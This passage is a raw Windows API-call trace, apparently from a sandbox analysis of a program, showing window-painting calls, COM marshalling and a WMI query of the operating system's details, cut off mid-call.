GetClientRect (in: hWnd=0x40162, lpRect=0x39d204 | out: lpRect=0x39d204) returned 1 [0042.111] GetCurrentObject (hdc=0x1701025f, type=0x1) returned 0x1b00017 [0042.111] GetCurrentObject (hdc=0x1701025f, type=0x2) returned 0x1900010 [0042.111] GetCurrentObject (hdc=0x1701025f, type=0x7) returned 0x2c05025e [0042.111] GetCurrentObject (hdc=0x1701025f, type=0x6) returned 0x18a002e [0042.111] SaveDC (hdc=0x1701025f) returned 1 [0042.111] GetNearestColor (hdc=0x1701025f, color=0xf0f0f0) returned 0xf0f0f0 [0042.111] CreateSolidBrush (color=0xf0f0f0) returned 0x1e1001d9 [0042.111] FillRect (hDC=0x1701025f, lprc=0x39d0a4, hbr=0x1e1001d9) returned 1 [0042.111] DeleteObject (ho=0x1e1001d9) returned 1 [0042.111] RestoreDC (hdc=0x1701025f, nSavedDC=-1) returned 1 [0042.115] GdipCreateHalftonePalette () returned 0x330801b3 [0042.115] SelectPalette (hdc=0x1701025f, hPal=0x330801b3, bForceBkgd=1) returned 0x188000b [0042.115] GetWindowTextLengthW (hWnd=0x40162) returned 9 [0042.115] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0042.115] GetSystemMetrics (nIndex=42) returned 0 [0042.115] GetWindowTextW (in: hWnd=0x40162, lpString=0x39d588, nMaxCount=10 | out: lpString="no reason") returned 9 [0042.115] CallWindowProcW (lpPrevWndFunc=0x77c725dd, hWnd=0x40162, Msg=0xd, wParam=0xa, lParam=0x39d588) returned 0x9 [0042.115] SelectPalette (hdc=0x1701025f, hPal=0x188000b, bForceBkgd=0) returned 0x330801b3 [0042.116] EndPaint (hWnd=0x40162, lpPaint=0x39d5f0) returned 1 [0042.120] IUnknown:Release (This=0x78c500) returned 0x1 [0042.120] CoUnmarshalInterface (in: pStm=0x7c39d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39e3a0 | out: ppv=0x39e3a0*=0x7e6214) returned 0x0 [0042.120] CoMarshalInterface (pStm=0x7c39d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x7e6214, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0042.120] WbemLocator:IUnknown:QueryInterface (in: This=0x7e6214, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e244 | out: ppvObject=0x39e244*=0x7e6214) returned 0x0 [0042.120] WbemLocator:IUnknown:QueryInterface (in: This=0x7e6214, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x39e200 | out: ppvObject=0x39e200*=0x0) returned 0x80004002 [0042.121] WbemLocator:IUnknown:QueryInterface (in: This=0x7e6214, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x39e01c | out: ppvObject=0x39e01c*=0x0) returned 0x80004002 [0042.121] WbemLocator:IUnknown:AddRef (This=0x7e6214) returned 0x3 [0042.121] WbemLocator:IUnknown:QueryInterface (in: This=0x7e6214, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x39db5c | out: ppvObject=0x39db5c*=0x0) returned 0x80004002 [0042.122] WbemLocator:IUnknown:QueryInterface (in: This=0x7e6214, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x39db0c | out: ppvObject=0x39db0c*=0x0) returned 0x80004002 [0042.122] WbemLocator:IUnknown:QueryInterface (in: This=0x7e6214, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39db18 | out: ppvObject=0x39db18*=0x7e6174) returned 0x0 [0042.122] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7e6174, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x39db20 | out: pCid=0x39db20*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0042.122] WbemLocator:IUnknown:Release (This=0x7e6174) returned 0x3 [0042.122] CoGetContextToken (in: pToken=0x39db78 | out: pToken=0x39db78) returned 0x0 [0042.122] IUnknown:QueryInterface (in: This=0x78c380, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39db3c | out: ppvObject=0x39db3c*=0x78c38c) returned 0x0 [0042.122] IComThreadingInfo:GetCurrentApartmentType (in: This=0x78c38c, pAptType=0x39db80 | out: pAptType=0x39db80*=3) returned 0x0 [0042.122] IUnknown:Release (This=0x78c38c) returned 0x0 [0042.123] CoGetObjectContext (in: riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x7e1efc | out: ppv=0x7e1efc*=0x78c380) returned 0x0 [0042.123] CoGetContextToken (in: pToken=0x39df80 | out: pToken=0x39df80) returned 0x0 [0042.123] WbemLocator:IUnknown:QueryInterface (in: This=0x7e6214, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e010 | out: ppvObject=0x39e010*=0x7e61fc) returned 0x0 [0042.123] WbemLocator:IRpcOptions:Query (in: This=0x7e61fc, pPrx=0x7e6214, dwProperty=2, pdwValue=0x39e038 | out: pdwValue=0x39e038) returned 0x0 [0042.123] WbemLocator:IUnknown:Release (This=0x7e61fc) returned 0x3 [0042.123] WbemLocator:IUnknown:Release (This=0x7e6214) returned 0x2 [0042.123] WbemLocator:IUnknown:Release (This=0x7e6214) returned 0x1 [0042.124] CoGetContextToken (in: pToken=0x39e2f0 | out: pToken=0x39e2f0) returned 0x0 [0042.124] WbemLocator:IUnknown:AddRef (This=0x7e6214) returned 0x2 [0042.124] WbemLocator:IUnknown:QueryInterface (in: This=0x7e6214, riid=0x741f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e5ac | out: ppvObject=0x39e5ac*=0x7e61f4) returned 0x0 [0042.124] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x7e61f4, pProxy=0x7e6214, pAuthnSvc=0x39e5fc, pAuthzSvc=0x39e5f8, pServerPrincName=0x39e5f0, pAuthnLevel=0x39e5f4, pImpLevel=0x39e5e4, pAuthInfo=0x39e5e8, pCapabilites=0x39e5ec | out: pAuthnSvc=0x39e5fc*=0xa, pAuthzSvc=0x39e5f8*=0x0, pServerPrincName=0x39e5f0, pAuthnLevel=0x39e5f4*=0x6, pImpLevel=0x39e5e4*=0x2, pAuthInfo=0x39e5e8, pCapabilites=0x39e5ec*=0x1) returned 0x0 [0042.124] WbemLocator:IUnknown:Release (This=0x7e61f4) returned 0x2 [0042.124] WbemLocator:IUnknown:QueryInterface (in: This=0x7e6214, riid=0x741f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e5a0 | out: ppvObject=0x39e5a0*=0x7e6214) returned 0x0 [0042.124] WbemLocator:IUnknown:QueryInterface (in: This=0x7e6214, riid=0x741f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e59c | out: ppvObject=0x39e59c*=0x7e61f4) returned 0x0 [0042.124] WbemLocator:IClientSecurity:SetBlanket (This=0x7e61f4, pProxy=0x7e6214, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0042.125] WbemLocator:IUnknown:Release (This=0x7e61f4) returned 0x3 [0042.125] WbemLocator:IUnknown:Release (This=0x7e6214) returned 0x2 [0042.125] CoTaskMemFree (pv=0x7eb920) [0042.125] WbemLocator:IUnknown:Release (This=0x7e6214) returned 0x1 [0042.125] SysStringLen (param_1=0x0) returned 0x0 [0042.125] CoGetContextToken (in: pToken=0x39e568 | out: pToken=0x39e568) returned 0x0 [0042.125] CoGetContextToken (in: pToken=0x39e4c8 | out: pToken=0x39e4c8) returned 0x0 [0042.125] WbemLocator:IUnknown:QueryInterface (in: This=0x7e6214, riid=0x39e598*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x39e594 | out: ppvObject=0x39e594*=0x880ca1c) returned 0x0 [0042.125] WbemLocator:IUnknown:AddRef (This=0x880ca1c) returned 0x3 [0042.125] WbemLocator:IUnknown:Release (This=0x880ca1c) returned 0x2 [0042.125] CoGetContextToken (in: pToken=0x39e528 | out: pToken=0x39e528) returned 0x0 [0042.125] WbemLocator:IUnknown:AddRef (This=0x880ca1c) returned 0x3 [0042.126] WbemLocator:IUnknown:QueryInterface (in: This=0x880ca1c, riid=0x741f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e5ac | out: ppvObject=0x39e5ac*=0x7e61f4) returned 0x0 [0042.126] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x7e61f4, pProxy=0x880ca1c, pAuthnSvc=0x39e5fc, pAuthzSvc=0x39e5f8, pServerPrincName=0x39e5f0, pAuthnLevel=0x39e5f4, pImpLevel=0x39e5e4, pAuthInfo=0x39e5e8, pCapabilites=0x39e5ec | out: pAuthnSvc=0x39e5fc*=0xa, pAuthzSvc=0x39e5f8*=0x0, pServerPrincName=0x39e5f0, pAuthnLevel=0x39e5f4*=0x6, pImpLevel=0x39e5e4*=0x2, pAuthInfo=0x39e5e8, pCapabilites=0x39e5ec*=0x1) returned 0x0 [0042.126] WbemLocator:IUnknown:Release (This=0x7e61f4) returned 0x3 [0042.126] WbemLocator:IUnknown:QueryInterface (in: This=0x880ca1c, riid=0x741f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e5a0 | out: ppvObject=0x39e5a0*=0x7e6214) returned 0x0 [0042.126] WbemLocator:IUnknown:QueryInterface (in: This=0x880ca1c, riid=0x741f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e59c | out: ppvObject=0x39e59c*=0x7e61f4) returned 0x0 [0042.126] WbemLocator:IClientSecurity:SetBlanket (This=0x7e61f4, pProxy=0x880ca1c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0042.126] WbemLocator:IUnknown:Release (This=0x7e61f4) returned 0x4 [0042.126] WbemLocator:IUnknown:Release (This=0x7e6214) returned 0x3 [0042.126] CoTaskMemFree (pv=0x7eb920) [0042.126] WbemLocator:IUnknown:Release (This=0x880ca1c) returned 0x2 [0042.126] SysStringLen (param_1=0x0) returned 0x0 [0042.126] CoGetContextToken (in: pToken=0x39e4a0 | out: pToken=0x39e4a0) returned 0x0 [0042.126] WbemLocator:IUnknown:AddRef (This=0x880ca1c) returned 0x3 [0042.126] IWbemServices:ExecQuery (in: This=0x880ca1c, strQueryLanguage="WQL", strQuery="select * from Win32_OperatingSystem", lFlags=16, pCtx=0x0, ppEnum=0x39e6b8 | out: ppEnum=0x39e6b8*=0x880d3d4) returned 0x0 [0042.136] IUnknown:QueryInterface (in: This=0x880d3d4, riid=0x741f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e510 | out: ppvObject=0x39e510*=0x880d3d8) returned 0x0 [0042.136] IClientSecurity:QueryBlanket (in: This=0x880d3d8, pProxy=0x880d3d4, pAuthnSvc=0x39e560, pAuthzSvc=0x39e55c, pServerPrincName=0x39e554, pAuthnLevel=0x39e558, pImpLevel=0x39e548, pAuthInfo=0x39e54c, pCapabilites=0x39e550 | out: pAuthnSvc=0x39e560*=0xa, pAuthzSvc=0x39e55c*=0x0, pServerPrincName=0x39e554, pAuthnLevel=0x39e558*=0x6, pImpLevel=0x39e548*=0x2, pAuthInfo=0x39e54c, pCapabilites=0x39e550*=0x1) returned 0x0 [0042.136] IUnknown:Release (This=0x880d3d8) returned 0x1 [0042.136] IUnknown:QueryInterface (in: This=0x880d3d4, riid=0x741f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e504 | out: ppvObject=0x39e504*=0x7ec4c4) returned 0x0 [0042.136] IUnknown:QueryInterface (in: This=0x880d3d4, riid=0x741f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e500 | out: ppvObject=0x39e500*=0x880d3d8) returned 0x0 [0042.136] IClientSecurity:SetBlanket (This=0x880d3d8, pProxy=0x880d3d4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0042.139] IUnknown:Release (This=0x880d3d8) returned 0x2 [0042.140] WbemLocator:IUnknown:Release (This=0x7ec4c4) returned 0x1 [0042.140] CoTaskMemFree (pv=0x7eb950) [0042.140] IUnknown:QueryInterface (in: This=0x880d3d4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e0fc | out: ppvObject=0x39e0fc*=0x7ec4c4) returned 0x0 [0042.140] WbemLocator:IUnknown:QueryInterface (in: This=0x7ec4c4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x39e0b8 | out: ppvObject=0x39e0b8*=0x0) returned 0x80004002 [0042.140] WbemLocator:IUnknown:QueryInterface (in: This=0x7ec4c4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x39ded4 | out: ppvObject=0x39ded4*=0x0) returned 0x80004002 [0042.141] WbemLocator:IUnknown:AddRef (This=0x7ec4c4) returned 0x3 [0042.141] WbemLocator:IUnknown:QueryInterface (in: This=0x7ec4c4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x39da14 | out: ppvObject=0x39da14*=0x0) returned 0x80004002 [0042.141] WbemLocator:IUnknown:QueryInterface (in: This=0x7ec4c4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x39d9c4 | out: ppvObject=0x39d9c4*=0x0) returned 0x80004002 [0042.141] WbemLocator:IUnknown:QueryInterface (in: This=0x7ec4c4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39d9d0 | out: ppvObject=0x39d9d0*=0x7ec424) returned 0x0 [0042.141] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7ec424, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x39d9d8 | out: pCid=0x39d9d8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0042.141] WbemLocator:IUnknown:Release (This=0x7ec424) returned 0x3 [0042.141] CoGetContextToken (in: pToken=0x39da30 | out: pToken=0x39da30) returned 0x0 [0042.142] CoGetContextToken (in: pToken=0x39de38 | out: pToken=0x39de38) returned 0x0 [0042.142] WbemLocator:IUnknown:QueryInterface (in: This=0x7ec4c4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39dec8 | out: ppvObject=0x39dec8*=0x7ec4ac) returned 0x0 [0042.142] WbemLocator:IRpcOptions:Query (in: This=0x7ec4ac, pPrx=0x7ec4c4, dwProperty=2, pdwValue=0x39def0 | out: pdwValue=0x39def0) returned 0x80004002 [0042.142] WbemLocator:IUnknown:Release (This=0x7ec4ac) returned 0x3 [0042.142] WbemLocator:IUnknown:Release (This=0x7ec4c4) returned 0x2 [0042.142] CoGetContextToken (in: pToken=0x39e410 | out: pToken=0x39e410) returned 0x0 [0042.142] CoGetContextToken (in: pToken=0x39e370 | out: pToken=0x39e370) returned 0x0 [0042.142] WbemLocator:IUnknown:QueryInterface (in: This=0x7ec4c4, riid=0x39e440*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x39e43c | out: ppvObject=0x39e43c*=0x880d3d4) returned 0x0 [0042.142] IUnknown:AddRef (This=0x880d3d4) returned 0x4 [0042.142] IUnknown:Release (This=0x880d3d4) returned 0x3 [0042.142] IUnknown:Release (This=0x880d3d4) returned 0x2 [0042.142] WbemLocator:IUnknown:Release (This=0x880ca1c) returned 0x2 [0042.142] SysStringLen (param_1=0x0) returned 0x0 [0042.142] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x8800998, puCount=0x39e704 | out: puCount=0x39e704*=0x2) returned 0x0 [0042.142] WbemDefPath:IWbemPath:GetText (in: This=0x8800998, lFlags=4, puBuffLength=0x39e700*=0x0, pszText=0x0 | out: puBuffLength=0x39e700*=0xf, pszText=0x0) returned 0x0 [0042.142] WbemDefPath:IWbemPath:GetText (in: This=0x8800998, lFlags=4, puBuffLength=0x39e700*=0xf, pszText="00000000000000" | out: puBuffLength=0x39e700*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0042.142] CoGetContextToken (in: pToken=0x39e540 | out: pToken=0x39e540) returned 0x0 [0042.142] IUnknown:AddRef (This=0x880d3d4) returned 0x3 [0042.143] IEnumWbemClassObject:Clone (in: This=0x880d3d4, ppEnum=0x39e700 | out: ppEnum=0x39e700*=0x880d49c) returned 0x0 [0042.144] IUnknown:QueryInterface (in: This=0x880d49c, riid=0x741f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e5c4 | out: ppvObject=0x39e5c4*=0x880d4a0) returned 0x0 [0042.144] IClientSecurity:QueryBlanket (in: This=0x880d4a0, pProxy=0x880d49c, pAuthnSvc=0x39e614, pAuthzSvc=0x39e610, pServerPrincName=0x39e608, pAuthnLevel=0x39e60c, pImpLevel=0x39e5fc, pAuthInfo=0x39e600, pCapabilites=0x39e604 | out: pAuthnSvc=0x39e614*=0xa, pAuthzSvc=0x39e610*=0x0, pServerPrincName=0x39e608, pAuthnLevel=0x39e60c*=0x6, pImpLevel=0x39e5fc*=0x2, pAuthInfo=0x39e600, pCapabilites=0x39e604*=0x1) returned 0x0 [0042.144] IUnknown:Release (This=0x880d4a0) returned 0x1 [0042.144] IUnknown:QueryInterface (in: This=0x880d49c, riid=0x741f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e5b8 | out: ppvObject=0x39e5b8*=0x7f2b0c) returned 0x0 [0042.144] IUnknown:QueryInterface (in: This=0x880d49c, riid=0x741f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e5b4 | out: ppvObject=0x39e5b4*=0x880d4a0) returned 0x0 [0042.144] IClientSecurity:SetBlanket (This=0x880d4a0, pProxy=0x880d49c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0042.146] IUnknown:Release (This=0x880d4a0) returned 0x2 [0042.146] WbemLocator:IUnknown:Release (This=0x7f2b0c) returned 0x1 [0042.146] CoTaskMemFree (pv=0x7eb950) [0042.146] IUnknown:QueryInterface (in: This=0x880d49c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39e1a0 | out: ppvObject=0x39e1a0*=0x7f2b0c) returned 0x0 [0042.146] WbemLocator:IUnknown:QueryInterface (in: This=0x7f2b0c, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x39e15c | out: ppvObject=0x39e15c*=0x0) returned 0x80004002 [0042.147] WbemLocator:IUnknown:QueryInterface (in: This=0x7f2b0c, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x39df7c | out: ppvObject=0x39df7c*=0x0) returned 0x80004002 [0042.147] WbemLocator:IUnknown:AddRef (This=0x7f2b0c) returned 0x3 [0042.147] WbemLocator:IUnknown:QueryInterface (in: This=0x7f2b0c, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x39dabc | out: ppvObject=0x39dabc*=0x0) returned 0x80004002 [0042.148] WbemLocator:IUnknown:QueryInterface (in: This=0x7f2b0c, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x39da6c | out: ppvObject=0x39da6c*=0x0) returned 0x80004002 [0042.148] WbemLocator:IUnknown:QueryInterface (in: This=0x7f2b0c, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39da78 | out: ppvObject=0x39da78*=0x7f2a6c) returned 0x0 [0042.148] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7f2a6c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x39da80 | out: pCid=0x39da80*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0042.148] WbemLocator:IUnknown:Release (This=0x7f2a6c) returned 0x3 [0042.148] CoGetContextToken (in: pToken=0x39dad8 | out: pToken=0x39dad8) returned 0x0 [0042.148] CoGetContextToken (in: pToken=0x39dee0 | out: pToken=0x39dee0) returned 0x0 [0042.148] WbemLocator:IUnknown:QueryInterface (in: This=0x7f2b0c, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39df70 | out: ppvObject=0x39df70*=0x7f2af4) returned 0x0 [0042.148] WbemLocator:IRpcOptions:Query (in: This=0x7f2af4, pPrx=0x7f2b0c, dwProperty=2, pdwValue=0x39df98 | out: pdwValue=0x39df98) returned 0x80004002 [0042.148] WbemLocator:IUnknown:Release (This=0x7f2af4) returned 0x3 [0042.149] WbemLocator:IUnknown:Release (This=0x7f2b0c) returned 0x2 [0042.149] CoGetContextToken (in: pToken=0x39e4b0 | out: pToken=0x39e4b0) returned 0x0 [0042.149] CoGetContextToken (in: pToken=0x39e410 | out: pToken=0x39e410) returned 0x0 [0042.149] WbemLocator:IUnknown:QueryInterface (in: This=0x7f2b0c, riid=0x39e4e0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x39e4dc | out: ppvObject=0x39e4dc*=0x880d49c) returned 0x0 [0042.149] IUnknown:AddRef (This=0x880d49c) returned 0x4 [0042.149] IUnknown:Release (This=0x880d49c) returned 0x3 [0042.149] IUnknown:Release (This=0x880d49c) returned 0x2 [0042.149] IUnknown:Release (This=0x880d3d4) returned 0x2 [0042.149] SysStringLen (param_1=0x0) returned 0x0 [0042.149] IEnumWbemClassObject:Reset (This=0x880d49c) returned 0x0 [0042.153] CoTaskMemAlloc (cb=0x4) returned 0x7c0fa8 [0042.172] IEnumWbemClassObject:Next (in: This=0x880d49c, lTimeout=-1, uCount=0x1, apObjects=0x7c0fa8, puReturned=0x22e2c74 | out: apObjects=0x7c0fa8*=0x880d4d8, puReturned=0x22e2c74*=0x1) returned 0x0 [0042.178] IUnknown:QueryInterface (in: This=0x880d4d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x39dd60 